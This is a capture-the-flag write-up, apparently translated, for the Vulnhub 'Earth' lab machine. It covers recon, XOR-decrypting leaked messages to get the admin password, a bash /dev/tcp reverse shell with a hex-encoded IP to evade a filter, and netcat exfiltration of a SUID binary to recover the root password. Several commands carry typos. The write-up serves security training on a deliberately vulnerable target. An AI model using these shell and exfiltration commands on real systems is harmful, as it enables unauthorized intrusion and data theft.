Article directory
- Vulnhub Series Target Drone-The Planets: Earth
-
- 1. Information collection
-
- 1.1 Host scanning
- 1.2 Port scanning
- 1.3 Directory blasting
- 2. Vulnerability detection
-
- 2.1 XOR decryption
- 2.2 Decoding
- 3. Exploiting vulnerabilities
-
- 3.1 Rebound Shell
- 4. Privilege escalation
-
- 4.1 NC file transfer
- Netcat (nc) file transfer
Vulnhub series target drone-The Planets: Earth
1. Information collection
1.1 Host Scan
arp-scan -l
1.2 Port Scan
nmap -p- -A 192.168.188.198
It was found that the target drone opened ports 22, 80, and 443.
Visit page
The page reports error request 400. Add DNS resolution to the hosts file.
Visit http://earth.local/
1.3 Directory Explosion
dirsearch -u http://earth.local/ -e * -i 200
The /admin/login directory was exploded, and when I visited it in a browser, I found that it was a login page.
Directory blasting on another page
dirsearch -u https://terratest.earth.local/ -i 200
2. Vulnerability detection
Visit the robots.txt page
It was found that in addition to the regular format that cannot be accessed, there is a Disallow: /testingnotes.*
at the end, which is spliced with the above suffix format to access the txt
file.
Translate page
Notes on testing secure messaging systems: *Using XOR encryption as the algorithm should be as secure as that used in RSA. *Earth has confirmed that they received the message we sent. *testdata.txt is used to test encryption. *terra is used as the username for the admin portal. To-do items: *How do we securely send monthly keys to Earth? Or should we change keys once a week? *Need to test different key lengths to prevent brute force. How long should a key be? *Needs improvements to the messaging interface and admin panel interface, which is currently very basic.
At this point we know that the encryption algorithm is XOR, the username is terra, and there is also a testdata.txt for testing encryption.
Page access/testdata.txt
Translated as follows
According to radiometric dating and other evidence, the Earth was formed 4.5 billion years ago. During the first billion years of Earth's history, life emerged in the oceans and began to influence the Earth's atmosphere and surface, leading to the proliferation of anaerobic and later aerobic organisms. Some geological evidence suggests that life may have emerged as early as 4.1 billion years ago.
Return to the previous page and there are three strings of data below http://earth.local/
Use three secret keys to try to find the password corresponding to the username terra
2.1 XOR decryption
XOR, the full name is Exclusive OR (exclusive OR), is a logical operator. XOR is often used for data encryption, checksum calculation.
Perform XOR operation on Previous Messages and testdata.txt. Here we write a script to XOR decrypt.
import binascii data1 = "37090b59030f11060b0a1b4e000000000000431b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340 e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a 1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4 f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18 010a43220f1716010d40" data2 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104 b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e15 0055011e100811430a59061417030d1117430910035506051611120b45" data3 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041 c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d 4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1 b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242 150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a01060 0124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12 171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a" f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode() print(hex(int(data1,16) ^ int(f,16))) print(hex(int(data2,16) ^ int(f,16))) print(hex(int(data3,16) ^ int(f,16)))
The contents of the testdata.txt file.
Execute the script and the three strings of data obtained are all in hexadecimal.
2.2 Decoding
Use the decoding tool in utools to decode.
first string of characters
second string of characters
The third string of characters
You can see that the first two have no important data, and the third one is repeated earthclimatechangebad4humans
Try username and password to log in
terra earthclimatechangebad4humans
login successful
Observe the page and find that the command can be executed
Command Execution Vulnerability
Check if there is a flag file and find one /var/earth_web/user_flag.txt
View the /var/earth_web/user_flag.txt file
Get the first flag
3. Vulnerability Exploitation
3.1 Rebound Shell
Now that we can execute the command, we can rebound the shell
bash -i & amp;> /deb/tcp/192.168.188.198/8888 0> & amp;1
Found that the remote connection is prohibited.
In this case, you can hex-encode the IP address or base64-encode the entire command. Here I choose to hex encode the IP address.
IP address decimal conversion.
bash -i > & amp; /dev/tcp/0XC0A8BC9D/8888 0> & amp;1
Then listen to port 8888 on the kali host
nc -lnvp 8888 -e /bin/bash
Successful rebound
View the current user’s permissions
Found that the permissions are low, try to extract.
4. Privilege Elevation
View some files with special permissions
find / -perm -u=s -type f 2>/dev/null
Command analysis:
-perm -u=s
: Indicates matching files based on file permissions. Among them,-perm
is used to specify the permissions to be matched,-u
represents user permissions, ands
represents SetUID permissions. SetUID permission (Set User ID) is a special permission bit. When the user executes the file, it will be executed as the owner of the file.-type f
: Indicates that only regular files are matched.f
here means file.2>/dev/null
: Redirect error output (stderr) to /dev/null, that is, discard error information.
See the reset_root file and try to run
Found unable to run.
4.1 NC file transfer
Use nc to transfer files
Enter nc -nlvp 7788 >reset_root
on Kali to enable monitoring.
Enter the following command into the target machine
nc 192.168.188.157 7788 < /usr/bin/reset_root
Command analysis:
- Use the Netcat (nc) tool to send the
/usr/bin/reset_root
file to port 7788 of the receiving end with the IP address192.168.188.157
.
strace debugging tool
Use the strace tool to detect the running process of the reset_root file. If it does not exist, you can download it.
sudo apt install strace
Debug reset_root and grant execution permissions to the reset_root file.
chmod + x reset_root strace ./reset_root
Command analysis:
- strace is a tool for tracing process system calls and signals
strace
: Indicates starting the strace tool../reset_root
: Indicates the executable file or command to be executed.
It was found that the file execution failed because these three files or directories were missing.
Create these three files on the target shell
Enter the target machine terminal to create keys
touch /dev/shm/kHgTFI5G touch /dev/shm/Zw7bV9U5 touch /tmp/kcM0Wewe
After creation, execute reset_root
Obtained the root password: Earth
Successfully obtained root permissions and got the final flag
Netcat (nc) file transfer
File transfer using Netcat (nc) allows you to quickly transfer files between computers. Netcat is a network tool that can create network connections, send and receive data.
detailed steps:
-
Start listening on the receiving end
nc -l -p <port> > received_file
Run the above command on the receiving end to listen on the specified port. The
-l
parameter indicates the listening mode, and the-p
parameter is used to specify the listening port number. All incoming data will be redirected to thereceived_file
file. -
Send files on the sending side
nc <receiver_ip> <receiver_port> < file_to_send
Run the above command on the sending side to send the file.
is the IP address of the receiving end,
is the port number opened by the receiving end,< file_to_send
is the name of the file to be sent or path. Netcat will send the contents of the file to the receiving end over the network. -
The receiving end receives the file:
The receiving end will write the data to the file specified by
received_file
. You can find the file in the receiving end's file system and process it further.
Make sure the following when using it:
- There is a network connection between the sender and receiver, and the network settings are correct.
- The receiving port is not blocked by a firewall or other network security device.
- Both the sender and receiver have sufficient permissions to read and write the file.
- Make sure the file path and file name are correct.